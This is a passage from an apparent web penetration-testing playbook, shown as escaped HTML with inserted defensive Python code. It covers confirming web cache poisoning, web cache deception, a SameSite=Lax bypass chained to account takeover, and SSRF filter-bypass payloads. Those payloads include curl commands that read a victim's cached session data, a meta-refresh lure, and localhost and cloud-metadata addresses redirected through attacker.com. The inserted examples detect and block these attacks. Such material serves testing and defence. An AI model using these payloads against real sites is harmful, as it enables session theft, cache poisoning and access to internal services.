&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/?cb=POISON123&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;x-cache: HIT&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Phase 3: Read cached response (must contain &amp;#34;evil.com&amp;#34;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/?cb=POISON123&amp;#34;&lt;/span&gt; | grep &lt;span style="color:#a6d189"&gt;&amp;#34;evil.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If it appears → Cache Poisoning CONFIRMED&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="impact-by-reflection-location" &gt;
&lt;div&gt;
&lt;a href="#impact-by-reflection-location"&gt;
###
&lt;/a&gt;
Impact by Reflection Location
&lt;/div&gt;
&lt;/h4&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Where the Payload Appears&lt;/th&gt;
&lt;th&gt;Impact&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;lt;script src=...&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Stored XSS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Executes JS on every visitor&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;lt;link rel=canonical&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;SEO Poisoning&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Google indexes attacker URL&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;lt;meta property=&amp;quot;og:url&amp;quot;&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Phishing previews&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;WhatsApp/Facebook show fake link&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot;&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Forced redirect&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Victim redirected without interaction&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;lt;form action=...&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Credential theft&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Forms send to attacker&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;@import url(...)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;CSS data exfiltration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Steals tokens via CSS injection&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
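&lt;p&gt;Seen from the defender side, Steps 1 to 3 are detectable at the edge. The following added example (not the playbook's code) runs the unkeyed-header list from Step 2 over constructed CDN access-log records and flags the moment a poisoned object is served to a different client; it assumes the log records request headers and cache status as JSON lines and that &lt;code&gt;TRUSTED_HOSTS&lt;/code&gt; holds your own hostnames.&lt;/p&gt;

```python
# Added example (not the playbook's code): detection logic for the unkeyed
# headers listed in Step 2, run over edge/CDN access logs. Assumptions: the
# log is JSON lines carrying the request headers and the cache status;
# TRUSTED_HOSTS holds your own hostnames; the sample records are constructed.
import json

TRUSTED_HOSTS = {"www.example.com", "example.com"}
HOST_OVERRIDES = ("x-forwarded-host", "x-host", "forwarded")
URL_OVERRIDES = ("x-original-url", "x-rewrite-url",
                 "x-amz-website-redirect-location")
METHOD_OVERRIDES = ("x-http-method-override", "x-http-method",
                    "x-method-override")


def forwarded_host(value):
    """Extract host=... from an RFC 7239 Forwarded header, or None."""
    for pair in value.replace(";", ",").split(","):
        name, _, val = pair.strip().partition("=")
        if name.strip().lower() == "host":
            return val.strip().strip('"')
    return None


def suspicious_headers(headers):
    """Return (header, value, reason) for each unkeyed-input header that
    should never reach the origin from the public internet."""
    found = []
    for name, value in headers.items():
        n = name.lower()
        if n in HOST_OVERRIDES:
            host = forwarded_host(value) if n == "forwarded" else value
            if host and host.strip().lower() not in TRUSTED_HOSTS:
                found.append((n, value, "host override to an untrusted host"))
        elif n in URL_OVERRIDES:
            found.append((n, value, "path override header"))
        elif n in METHOD_OVERRIDES:
            found.append((n, value, "method override header"))
    return found


def scan_edge_log(lines):
    """Return alerts for poisoning attempts. A flagged MISS that fills the
    cache, followed by a HIT on the same key for a different client, is the
    defender's view of Step 3: the poisoned object was served to others."""
    alerts = []
    filled_by = {}   # cache key (host, uri incl. query) to client that filled it
    for line in lines:
        rec = json.loads(line)
        key = (rec["host"], rec["uri"])
        status = rec.get("cache_status", "").upper()
        flagged = suspicious_headers(rec.get("headers", {}))
        for name, value, reason in flagged:
            alerts.append({"severity": "medium", "client": rec["client"], "key": key,
                           "detail": "%s: %s (%s)" % (name, value, reason)})
        if flagged and status == "MISS":
            filled_by[key] = rec["client"]
        elif (not flagged and status == "HIT"
              and filled_by.get(key) not in (None, rec["client"])):
            alerts.append({"severity": "high", "client": rec["client"], "key": key,
                           "detail": "served cached object filled by %s while an override header was set" % filled_by[key]})
    return alerts


# Constructed edge log: a poisoning attempt, the poisoned object served to a
# bystander, a legitimate internal X-Forwarded-Host, and a path-override probe.
SAMPLE_LOG = [
    '{"client": "198.51.100.7", "host": "www.example.com", "uri": "/?cb=POISON123", '
    '"cache_status": "MISS", "headers": {"X-Forwarded-Host": "evil.com", "User-Agent": "curl/8.5"}}',
    '{"client": "203.0.113.9", "host": "www.example.com", "uri": "/?cb=POISON123", '
    '"cache_status": "HIT", "headers": {"User-Agent": "Mozilla/5.0"}}',
    '{"client": "203.0.113.9", "host": "www.example.com", "uri": "/about", '
    '"cache_status": "HIT", "headers": {"X-Forwarded-Host": "www.example.com"}}',
    '{"client": "198.51.100.7", "host": "www.example.com", "uri": "/login", '
    '"cache_status": "MISS", "headers": {"X-Original-URL": "/evil"}}',
]

if __name__ == "__main__":
    for alert in scan_edge_log(SAMPLE_LOG):
        print(alert["severity"], alert["client"], alert["detail"])
```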
&lt;h3 id="182-web-cache-deception-wcd" &gt;
&lt;div&gt;
&lt;a href="#182-web-cache-deception-wcd"&gt;
##
&lt;/a&gt;
18.2 Web Cache Deception (WCD)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;: Force the cache to store the victim&amp;rsquo;s SENSITIVE responses and then read them.&lt;/p&gt;
&lt;h4 id="conditions-to-be-exploitable" &gt;
&lt;div&gt;
&lt;a href="#conditions-to-be-exploitable"&gt;
###
&lt;/a&gt;
Conditions to be exploitable:
&lt;/div&gt;
&lt;/h4&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;Cache-Control&lt;/code&gt; does NOT contain &lt;code&gt;private&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Response contains sensitive data (JWT, tokens, PII, CSRF nonce)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;X-Cache: MISS&lt;/code&gt; → &lt;code&gt;X-Cache: HIT&lt;/code&gt; confirmed&lt;/li&gt;
&lt;li&gt;No &lt;code&gt;Vary: Cookie&lt;/code&gt; header&lt;/li&gt;
&lt;/ol&gt;
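&lt;p&gt;The four conditions can be checked on the server side before an attacker does. The following added example (not the playbook's code) audits one authenticated response for them, including the path-confusion trick used in the payloads below and the 18.3 flow, whose fix is the same; it assumes a CDN that caches by file extension and otherwise honours &lt;code&gt;Cache-Control&lt;/code&gt;, and its sample responses are constructed.&lt;/p&gt;

```python
# Added example (not the playbook's code): a server-side audit of the four
# WCD conditions, meant for CI or a proxy in front of authenticated pages.
# Assumes a CDN that caches by file extension and otherwise honours
# Cache-Control; the sample responses are constructed.
STATIC_TYPES = {
    ".css": ("text/css",),
    ".js": ("application/javascript", "text/javascript"),
    ".png": ("image/png",), ".jpg": ("image/jpeg",), ".ico": ("image/x-icon",),
    ".pdf": ("application/pdf",), ".json": ("application/json",),
    ".xml": ("application/xml", "text/xml"),
}
# Crude markers for per-user secrets in a body: JWT header prefix, tokens.
SENSITIVE_MARKERS = ("eyJ", "csrf", "token", "secret", "session")


def directives(value):
    """Cache-Control 'private, max-age=0' into {'private', 'max-age'}."""
    return {d.strip().split("=")[0].lower() for d in value.split(",") if d.strip()}


def audit_wcd(path, headers, body, authenticated=True):
    """Return (exploitable, findings) for one response.

    exploitable is True when a shared cache may store this authenticated
    response and it carries per-user data or shows path confusion.
    """
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    if not authenticated:
        return False, findings          # WCD is about per-user responses
    cc = directives(h.get("cache-control", ""))
    cacheable = cc.isdisjoint({"private", "no-store"})          # condition 1
    if cacheable:
        findings.append("Cache-Control allows shared caching: %s"
                        % (h.get("cache-control") or "(absent)"))
    # Condition 4. Vary: Cookie is a weak fix on its own (many CDNs ignore
    # Vary); private/no-store is the real one, so both are reported.
    vary = {v.strip().lower() for v in h.get("vary", "").split(",") if v.strip()}
    if "cookie" not in vary:
        findings.append("no Vary: Cookie")
    # Path confusion (the /my-profile.css trick): static-looking URL whose
    # Content-Type is not what that extension should serve.
    last = path.split("?")[0].rsplit("/", 1)[-1].lower()
    ext = "." + last.rsplit(".", 1)[1] if "." in last else ""
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    confused = ext in STATIC_TYPES and ctype not in STATIC_TYPES[ext]
    if confused:
        findings.append("path confusion: %s served as %s" % (path, ctype or "unknown type"))
    lowered = body.lower()
    sensitive = [m for m in SENSITIVE_MARKERS if m.lower() in lowered]   # condition 2
    if sensitive:
        findings.append("body contains per-user markers: %s" % ", ".join(sensitive))
    # Condition 3 (MISS then HIT) is observed at runtime; cacheability plus
    # exposure is its static equivalent.
    return cacheable and bool(sensitive or confused), findings


# Constructed responses: the vulnerable profile page and its hardened twin.
VULN_HEADERS = {"Content-Type": "text/html; charset=utf-8", "Cache-Control": "max-age=3600"}
FIXED_HEADERS = {"Content-Type": "text/html; charset=utf-8",
                 "Cache-Control": "private, no-store", "Vary": "Cookie"}
PROFILE_BODY = "Welcome back. session token: eyJhbGciOiJIUzI1NiJ9.e30.constructed"

if __name__ == "__main__":
    for p, hdrs in (("/my-profile.css", VULN_HEADERS),
                    ("/my-profile?cb=victim123", VULN_HEADERS),
                    ("/my-profile", FIXED_HEADERS)):
        print(p, audit_wcd(p, hdrs, PROFILE_BODY))
```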
&lt;h4 id="payload--force-cache-of-sensitive-page" &gt;
&lt;div&gt;
&lt;a href="#payload--force-cache-of-sensitive-page"&gt;
###
&lt;/a&gt;
Payload — Force Cache of Sensitive Page
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extensions that CDNs typically cache: .css .js .png .jpg .ico .pdf .json .xml&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Apply these extensions to sensitive pages:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Victim visits (with cookies):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/my-profile.css&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Cookie: session=VICTIM_SESSION&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Attacker reads the cache:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/my-profile.css&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;jwt\|token\|secret&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="same-technique-with-cache-buster-to-isolate-a-specific-victim" &gt;
&lt;div&gt;
&lt;a href="#same-technique-with-cache-buster-to-isolate-a-specific-victim"&gt;
###
&lt;/a&gt;
Same technique with Cache Buster to isolate a specific victim:
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Attacker prepares URL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;CACHE_BUSTER&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;victim_&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;date +%s&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Victim visits (with authenticated cookies):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# https://target.com/my-profile?cb=$CACHE_BUSTER&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Attacker reads:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/my-profile?cb=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$CACHE_BUSTER&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="183-samesite-bypass--wcd" &gt;
&lt;div&gt;
&lt;a href="#183-samesite-bypass--wcd"&gt;
##
&lt;/a&gt;
18.3 SameSite Bypass + WCD
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Cookies with &lt;code&gt;SameSite=Lax&lt;/code&gt; are not sent on cross-site subresource requests such as &lt;code&gt;&amp;lt;img&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; and &lt;code&gt;fetch()&lt;/code&gt;, BUT they ARE sent on a &lt;strong&gt;top-level navigation&lt;/strong&gt; (the URL in the address bar changes).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;&amp;lt;!-- Payload: meta refresh = top-level navigation --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#ca9ee6"&gt;meta&lt;/span&gt; &lt;span style="color:#8caaee"&gt;http-equiv&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;refresh&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;content&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;0; url=https://target.com/my-profile?cb=victim123&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;Attack flow:
1. Attacker hosts page with &amp;lt;meta refresh&amp;gt; → URL with cache buster
2. Victim visits attacker&amp;#39;s page
3. Browser performs top-level nav → SameSite=Lax cookies SENT
4. Victim&amp;#39;s authenticated response (with JWT) is cached
5. Attacker visits same URL → X-Cache: HIT → receives victim&amp;#39;s response
6. Extracts JWT → ATO (Account Takeover)
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="184-trap-reflection--cache-poisoning" &gt;
&lt;div&gt;
&lt;a href="#184-trap-reflection--cache-poisoning"&gt;
##
&lt;/a&gt;
18.4 Trap: Reflection ≠ Cache Poisoning
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Common mistake&lt;/th&gt;
&lt;th&gt;Why it&amp;rsquo;s wrong&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&amp;ldquo;The header reflects in the response&amp;rdquo;&lt;/td&gt;
&lt;td&gt;It&amp;rsquo;s reflection. Without cache proof, it&amp;rsquo;s info-level&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&amp;ldquo;X-Cache: HIT appeared&amp;rdquo;&lt;/td&gt;
&lt;td&gt;Only the base page is cached, not your payload&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&amp;ldquo;I sent a payload and saw it in the response&amp;rdquo;&lt;/td&gt;
&lt;td&gt;You saw your OWN response, not the cache&amp;rsquo;s&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Rule&lt;/strong&gt;: Without confirmed &lt;code&gt;Age&lt;/code&gt;/&lt;code&gt;X-Cache:HIT&lt;/code&gt; on the response WITH payload → NOT cache poisoning.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="19-ssrf-sqli-lfi--other-classes" &gt;
&lt;div&gt;
&lt;a href="#19-ssrf-sqli-lfi--other-classes"&gt;
#
&lt;/a&gt;
19. SSRF, SQLI, LFI &amp;amp; OTHER CLASSES
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="191-ssrf--server-side-request-forgery" &gt;
&lt;div&gt;
&lt;a href="#191-ssrf--server-side-request-forgery"&gt;
##
&lt;/a&gt;
19.1 SSRF — Server-Side Request Forgery
&lt;/div&gt;
&lt;/h3&gt;
&lt;h4 id="bypass-ip-blocklist-11-techniques" &gt;
&lt;div&gt;
&lt;a href="#bypass-ip-blocklist-11-techniques"&gt;
###
&lt;/a&gt;
Bypass IP Blocklist (11 techniques)
&lt;/div&gt;
&lt;/h4&gt;
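&lt;p&gt;From the defender side, the eleven representations listed under this heading collapse into one requirement: canonicalise the host exactly as the HTTP client will, resolve it, and check every resulting address before (and at each hop of) the fetch. The following added example (not the playbook's code) does that; it assumes only http/https may be fetched, and its &lt;code&gt;resolver&lt;/code&gt; argument is injectable so the demo runs offline with a constructed &lt;code&gt;FAKE_DNS&lt;/code&gt; table.&lt;/p&gt;

```python
# Added example (not the playbook's code): the server-side counterpart to the
# eleven representations listed in this subsection. It canonicalises the host,
# resolves it and checks every address before a fetch. Assumed: only http and
# https are permitted; `resolver` is injectable so the demo runs offline, with
# the constructed FAKE_DNS table standing in for real lookups.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = ("http", "https")
# Never fetch from these; extend with your own internal ranges.
DENY_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16",   # link-local, includes cloud metadata (technique 10)
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "ff00::/8",
)]
ALT_DOTS = ("\u3002", "\uff0e", "\uff61")   # IDNA label separators (technique 9)


def _ipv4_part(part):
    """inet_aton rules: 0x.. is hex, a leading 0 is octal, else decimal."""
    if not part.isalnum():
        raise ValueError(part)
    if part[:2] in ("0x", "0X"):
        return int(part[2:], 16)
    if len(part) != 1 and part.startswith("0"):
        return int(part, 8)
    return int(part, 10)


def inet_aton_like(host):
    """Mimic the lenient C inet_aton used by HTTP client libraries, so that
    2130706433, 0x7f000001, 0177.0.0.1 and 127.1 all become 127.0.0.1
    (techniques 1 and 8). Returns an IPv4Address, or None if not numeric."""
    parts = host.split(".")
    if len(parts) not in (1, 2, 3, 4):
        return None
    try:
        nums = [_ipv4_part(p) for p in parts]
    except ValueError:
        return None
    # a.b.c.d / a.b.c / a.b / a: the last part fills the remaining bytes.
    widths = [8] * (len(nums) - 1) + [32 - 8 * (len(nums) - 1)]
    value = 0
    for num, width in zip(nums, widths):
        if num not in range(2 ** width):
            return None
        value = value * 2 ** width + num
    return ipaddress.IPv4Address(value)


def system_resolver(host):
    """Real A/AAAA lookup; the demo swaps in fake_resolver instead."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def host_to_ips(host, resolver):
    """Every address the fetcher could end up connecting to."""
    literal = inet_aton_like(host)
    if literal is not None:
        return [literal]
    try:
        ip = ipaddress.ip_address(host)   # IPv6 literal (technique 4)
    except ValueError:
        # nip.io, wildcard DNS and homograph names (2, 7, 9) all land here
        return [ipaddress.ip_address(a) for a in resolver(host)]
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped               # ::ffff:127.0.0.1 is 127.0.0.1
    return [ip]


def check_outbound_url(url, resolver=system_resolver):
    """Return (allowed, reason). Run it on EVERY hop: fetch with redirects
    disabled and re-check each Location (techniques 3 and 6), and connect to
    the address validated here rather than re-resolving (DNS rebinding)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %s" % parts.scheme   # file:// (11)
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"                         # user@host (5)
    host = parts.hostname or ""
    for dot in ALT_DOTS:
        host = host.replace(dot, ".")
    if not host:
        return False, "empty host"
    try:
        ips = host_to_ips(host, resolver)
    except (ValueError, socket.gaierror):
        return False, "unresolvable host: %s" % host
    for ip in ips:
        if any(ip in net for net in DENY_NETS):
            return False, "%s resolves to denied address %s" % (host, ip)
    return True, "%s resolves to %s" % (host, ", ".join(str(i) for i in ips))


# Constructed answers standing in for DNS (nip.io encodes the IP in the name).
FAKE_DNS = {"api.example.com": ["93.184.216.34"], "1.0.0.127.nip.io": ["127.0.0.1"],
            "metadata.google.internal": ["169.254.169.254"], "127.0.0.1.attacker.com": ["127.0.0.1"]}


def fake_resolver(host):
    if host not in FAKE_DNS:
        raise socket.gaierror("constructed NXDOMAIN for %s" % host)
    return FAKE_DNS[host]
```

A real deployment keeps the resolved address and connects to it directly (or pins it in the HTTP client), otherwise a second lookup at connect time reopens the DNS rebinding case.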
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. URL encoding&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;2130706433&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# decimal of 127.0.0.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;0x7f000001&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# hex&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;0177.0.0.1&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# octal&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. DNS rebinding&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;1.0.0.127&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;nip&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;io&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# resolves to 127.0.0.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Redirect&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;attacker&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;com&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;redirect&lt;span style="color:#e78284"&gt;?&lt;/span&gt;url&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;169.254.169.254&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. IPv6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;[::&lt;span style="color:#ef9f76"&gt;1&lt;/span&gt;]:&lt;span style="color:#ef9f76"&gt;80&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;[::ffff:&lt;span style="color:#ef9f76"&gt;127.0.0.1&lt;/span&gt;]&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. URL parser differentials&lt;/span&gt;
